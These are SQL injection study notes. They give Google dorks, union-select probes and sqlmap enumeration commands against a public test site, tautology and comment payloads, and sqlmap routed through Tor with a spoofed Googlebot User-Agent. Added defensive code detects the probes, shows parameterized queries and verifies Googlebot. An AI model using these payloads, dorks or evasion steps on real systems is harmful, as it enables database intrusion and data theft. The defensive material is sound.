Reference articles
Reference: http://bbs.pediy.com/thread-218235.htm
Google search:
inurl:"products.php?prodID="
inurl:buy.php?category=
http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/listproducts.php?cat='
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version
Sometimes the server cannot interpret @@version directly and it has to be converted: replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
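What the probe sequence above (quote test, order by, union select, information_schema, hex-encoded names) looks like from the server side, as an added example that is not part of the original notes: a small access-log scanner that URL-decodes each query parameter, tags the patterns used in the requests above, and decodes MySQL hex literals such as 0x4556454e5453 so the analyst sees which table name was asked for. The log lines are constructed (TEST-NET addresses) and imitate the request paths on this page; sqlmap's default self-identifying User-Agent is tagged too, but only as a weak signal, since the notes below show how easily it is changed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format access-log lines (not real traffic); the request
# paths mirror the probe sequence in the notes above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /listproducts.php?cat=%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /listproducts.php?cat=1+order+by+6 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:51 +0000] "GET /listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453 HTTP/1.1" 200 620 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:14:01:02 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each signature is applied to the URL-decoded value of every query parameter.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("version-fingerprint", re.compile(r"@@version|unhex\s*\(\s*hex\s*\(", re.I)),
    ("hex-literal", re.compile(r"\b0x(?:[0-9a-f]{2})+\b", re.I)),
    ("quote-probe", re.compile(r"^\s*'\s*$|'\s*(or|and)\b", re.I)),
]
HEX_LITERAL_RE = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)


def decode_hex_literals(value):
    """Replace MySQL hex string literals with their decoded text so the analyst
    sees the table or column name that was actually requested."""
    def repl(m):
        raw = bytes.fromhex(m.group(1))
        try:
            return "'" + raw.decode("ascii") + "'"
        except UnicodeDecodeError:
            return m.group(0)
    return HEX_LITERAL_RE.sub(repl, value)


def classify_value(value):
    """Return the signature names matched by one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan_log(text):
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qsl turns '+' into a space and decodes %XX escapes for us
        for param, value in parse_qsl(query, keep_blank_values=True):
            tags = classify_value(value)
            if "sqlmap" in m["ua"].lower():
                # default tool UA identifies itself; weak signal, trivially changed
                tags.append("tool-user-agent")
            if tags:
                findings.append({
                    "ip": m["ip"],
                    "param": param,
                    "value": decode_hex_literals(value),
                    "status": int(m["status"]),
                    "tags": tags,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['param']}={f['value']!r} {f['status']} {f['tags']}")
```

The single-quote probe is the line that also returned a 500, which is the corroborating signal worth alerting on: a database error reaching the client is exactly what the manual method above relies on.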
Types of SQL injection attacks
Classic SQLi
Blind or inferential SQL injection
DBMS-specific SQLi
Compounded SQLi
SQL injection + insufficient authentication
SQL injection + DDoS attacks
SQL injection + DNS hijacking
SQL injection + XSS
Incorrectly filtered escape characters
This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
Comments can even be used to cut off the rest of the query (there are three kinds of SQL comment). All three lines below end with a space:
' or '1'='1' --
' or '1'='1' ({
' or '1'='1' /*
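The concatenated statement above beside its parameterized form, as an added example that is not part of the original notes. It uses Python's sqlite3 module on an in-memory table with constructed rows rather than the MySQL backend the notes target; the behaviour of the `' or '1'='1' --` payload is the same on both: concatenation lets the input close the literal and comment out the rest, a bound parameter keeps it a string value.

```python
import sqlite3

# Payload from the list above: closes the quoted literal, adds a tautology,
# and comments out the rest of the statement.
TAUTOLOGY_PAYLOAD = "' or '1'='1' --"


def make_db():
    """In-memory users table with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    con.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                    [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return con


def lookup_vulnerable(con, user_name):
    """String concatenation, as in the statement quoted above: the input becomes SQL."""
    statement = "SELECT name FROM users WHERE name = '" + user_name + "';"
    return [row[0] for row in con.execute(statement)]


def lookup_parameterized(con, user_name):
    """Bound parameter: the driver passes the value separately, so a quote in it is data."""
    statement = "SELECT name FROM users WHERE name = ?;"
    return [row[0] for row in con.execute(statement, (user_name,))]


if __name__ == "__main__":
    con = make_db()
    for name in ("bob", TAUTOLOGY_PAYLOAD):
        print(repr(name))
        print("  concatenated :", lookup_vulnerable(con, name))
        print("  parameterized:", lookup_parameterized(con, name))
```

With a normal name both functions return the same row; with the payload the concatenated query returns every user, while the parameterized one returns nothing because no user is literally named `' or '1'='1' --`.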
http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4
apt-get install tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5
Spoofing the Googlebot User-Agent:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
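The defender's counterpart to the User-Agent spoofing above, added here and not part of the original notes: a User-Agent string proves nothing, so Google's documented check for a genuine crawler is a reverse-DNS lookup of the client IP (the name must end in googlebot.com or google.com) followed by a forward lookup of that name that must return the same IP. The resolver functions are injected so the example runs offline against constructed DNS data (TEST-NET addresses, made-up names); the real socket lookups are the defaults.

```python
import socket

# Host suffixes Google documents for its crawlers' reverse-DNS names.
GOOGLE_CRAWLER_SUFFIXES = (".googlebot.com", ".google.com")

# User-Agent string from the sqlmap command above.
GOOGLEBOT_UA = "Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def _reverse_dns(ip):
    return socket.gethostbyaddr(ip)[0]


def _forward_dns(host):
    return socket.gethostbyname(host)


def is_verified_googlebot(ip, reverse_lookup=_reverse_dns, forward_lookup=_forward_dns):
    """Google's documented verification: the PTR name must fall under
    googlebot.com or google.com, and the forward lookup of that name must
    return the same address (a PTR record alone can be set to anything)."""
    try:
        host = reverse_lookup(ip).rstrip(".").lower()
    except OSError:          # no PTR record at all
        return False
    if not host.endswith(GOOGLE_CRAWLER_SUFFIXES):
        return False
    try:
        return forward_lookup(host) == ip
    except OSError:          # name does not resolve forward
        return False


def classify_request(ip, user_agent, **lookups):
    """Label a request: 'verified' crawler, 'spoofed' crawler claim, or 'other'."""
    if "googlebot" not in user_agent.lower():
        return "other"
    return "verified" if is_verified_googlebot(ip, **lookups) else "spoofed"


# Constructed DNS data (TEST-NET addresses, not real Google infrastructure).
FAKE_PTR = {
    "192.0.2.10": "crawl-192-0-2-10.googlebot.com",  # genuine-looking, forward-confirms
    "192.0.2.20": "crawl-192-0-2-20.googlebot.com",  # PTR lies; forward lookup disagrees
    "192.0.2.77": "tor-exit.example.net",             # ordinary client or Tor exit
}
FAKE_A = {
    "crawl-192-0-2-10.googlebot.com": "192.0.2.10",
    "crawl-192-0-2-20.googlebot.com": "198.51.100.1",
}


def fake_reverse(ip):
    try:
        return FAKE_PTR[ip]
    except KeyError:
        raise OSError("NXDOMAIN (constructed)")


def fake_forward(host):
    try:
        return FAKE_A[host]
    except KeyError:
        raise OSError("NXDOMAIN (constructed)")


if __name__ == "__main__":
    for ip in list(FAKE_PTR) + ["192.0.2.99"]:
        print(ip, classify_request(ip, GOOGLEBOT_UA,
                                   reverse_lookup=fake_reverse, forward_lookup=fake_forward))
```

Only the address whose PTR name is under googlebot.com and whose forward lookup returns the same address counts as verified; a forged PTR, a Tor exit, or an address with no PTR at all is labelled spoofed, whatever the User-Agent says.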